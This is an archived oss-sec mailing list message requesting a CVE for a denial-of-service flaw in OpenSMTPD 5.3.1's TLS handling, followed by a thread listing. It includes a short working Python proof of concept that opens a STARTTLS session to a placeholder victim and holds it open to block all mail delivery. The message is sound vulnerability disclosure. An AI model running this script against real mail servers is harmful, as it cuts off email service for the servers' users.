oss-sec mailing list archives
CVE Request: DoS in OpenSMTPD TLS Support
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 18 May 2013 16:27:22 +0200
Hi Kurt,
The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its
sockets in blocking mode, allowing an attacker to prevent all mail
delivery simply by holding a socket open.
I discovered this accidentally, as I noticed my HP printer's smtp
client would keep the connection indefinitely open after an
unsuccessful authentication attempt, causing no more mail to be
delivered until I SIGKILL'd my smtpd process or unplugged my printer.
The following reproduces the attack trivially:
#!/usr/bin/env python2
import smtplib
import time
print "[+] Connecting to server and initiating TLS"
smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
smtp.starttls()
print "[+] No clients will be able to connect as long as this remains open."
time.sleep(100000000)
Apparently this was fixed recently upstream, noting "evil client" in
the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0
A snapshot has been posted to http://www.opensmtpd.org/archives/ , but
no patch release has yet been made.
Jason
Current thread:
- CVE Request: DoS in OpenSMTPD TLS Support Jason A. Donenfeld (May 18)
- Re: CVE Request: DoS in OpenSMTPD TLS Support Gilles Chehade (May 18)
- Re: Re: CVE Request: DoS in OpenSMTPD TLS Support Kurt Seifried (May 18)
- Re: CVE Request: DoS in OpenSMTPD TLS Support Jason A. Donenfeld (May 18)
- Re: Re: CVE Request: DoS in OpenSMTPD TLS Support Kurt Seifried (May 18)
- Re: Re: CVE Request: DoS in OpenSMTPD TLS Support Gilles Chehade (May 19)
- Re: CVE Request: DoS in OpenSMTPD TLS Support Gilles Chehade (May 18)